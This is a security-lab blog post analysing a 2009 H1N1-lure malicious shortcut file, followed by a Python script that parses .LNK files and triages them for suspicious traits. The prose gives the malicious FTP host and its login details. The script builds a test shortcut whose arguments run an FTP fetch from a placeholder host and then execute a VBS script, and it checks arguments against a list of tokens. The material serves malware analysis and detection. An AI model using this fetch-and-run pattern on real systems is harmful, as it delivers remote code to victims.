<<<
NEWS FROM THE LAB - Monday, July 27, 2009
>>>
 

 
H1N1 Shortcut Malware Posted by Mikko @ 11:35 GMT

We ran into another new piece of malware using the "H1N1" swine flu as a lure.

This one is a shortcut file. It is not a Windows EXE executable that has been renamed to .LNK; it is an actual link file.

Here's what the file looks like (md5: d17e956522f83995654666c0f2343797).

[Screenshot: H1N1]

Looking at the file from command prompt, it looks like a harmless shortcut, 1987 bytes in size.

[Screenshot: H1N1]

But when you view the contents, you see something suspicious:

[Screenshot: H1N1]

Let's have a look at the properties of the shortcut:

[Screenshot: H1N1]

It's linking to %ComSpec%? Doesn't sound too good. Let's copy and paste where this shortcut is linking to:

[Screenshot: H1N1]

That doesn't make much sense.

Let's try to break that into smaller pieces to see what it's doing:

[Screenshot: LNK shortcut malware code]

The end result: clicking on this shortcut will cause your machine to do the following things:

  •  Connect to an ftp site called www.g03z.com
  •  Log in with username aa33 and password bb33
  •  Download a script called p.vbs
  •  Run the script
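The analysis above boils down to reading two fields out of the .LNK: where the shortcut points (here, %ComSpec%, i.e. the command interpreter) and the arguments it passes (here, an FTP session that fetches and runs a script). The following added example (not code from the original post or from the lab) is a minimal parser for the Shell Link header and string-data section, enough to pull those two fields out and flag the pattern described in the post. The sample shortcuts it parses are constructed in the script itself, not the real 1987-byte file, and the hostname in the constructed arguments is a placeholder. It skips, without decoding, the optional LinkTargetIDList and LinkInfo sections and ignores the extra data blocks that a real shortcut may use to carry an environment-variable target, so on real samples it should be treated as a first-pass triage, not a full parser.

```python
import struct

# LinkFlags bits from the Shell Link (.LNK) binary format.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# CLSID that every Shell Link header carries: 00021401-0000-0000-C000-000000000046.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C  # 76 bytes


def parse_lnk(data: bytes) -> dict:
    """Return the string-data fields (target, arguments, ...) of a .LNK blob."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = HEADER_SIZE
    # Optional sections precede the strings; skip them using their own size fields.
    if flags & HAS_LINK_TARGET_ID_LIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]   # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]       # LinkInfoSize includes itself
    unicode = bool(flags & IS_UNICODE)

    def read_string() -> str:
        # Each string is a 2-byte character count followed by that many characters.
        nonlocal off
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        nbytes = count * 2 if unicode else count
        raw = data[off:off + nbytes]
        off += nbytes
        return raw.decode("utf-16-le" if unicode else "cp1252")

    fields = {"flags": flags}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        fields[name] = read_string() if flags & flag else ""
    return fields


def triage(fields: dict) -> list:
    """Flag the indicators seen in the post: cmd.exe target, FTP and VBS in the arguments."""
    findings = []
    target = fields["relative_path"].lower()
    args = fields["arguments"].lower()
    if "%comspec%" in target or target.endswith("cmd.exe"):
        findings.append("target is the command interpreter")
    if len(args) > 200:
        findings.append("unusually long command-line arguments")
    for token in ("ftp", ".vbs", "cscript", "wscript"):
        if token in args:
            findings.append("arguments reference " + token)
    return findings


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal Unicode .LNK with only a relative path and arguments (test data)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def enc(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + enc(relative_path) + enc(arguments)


# Constructed samples: one mimicking the post's pattern (placeholder host), one benign.
SUSPICIOUS_LNK = build_lnk("%ComSpec%", "/c ftp ftp.example.invalid && cscript p.vbs")
BENIGN_LNK = build_lnk("..\\notepad.exe", "readme.txt")

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_LNK), ("benign", BENIGN_LNK)):
        f = parse_lnk(blob)
        print(label, "->", repr(f["relative_path"]), repr(f["arguments"]), triage(f))
```

Run it and the constructed suspicious shortcut is reported for its command-interpreter target and for the ftp/.vbs/cscript tokens in its arguments, while the Notepad shortcut produces no findings. The size check is there because a 1987-byte shortcut whose arguments run to several hundred characters is itself a useful tell; a few hundred bytes is normal for a desktop shortcut.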

So who owns g03z.com? Well, it's Mr. Zzzzggg:

[Screenshot: H1N1]

The domain is still up, but the file p.vbs is currently missing from the server, so right now nothing happens.

We detect and block this malicious shortcut.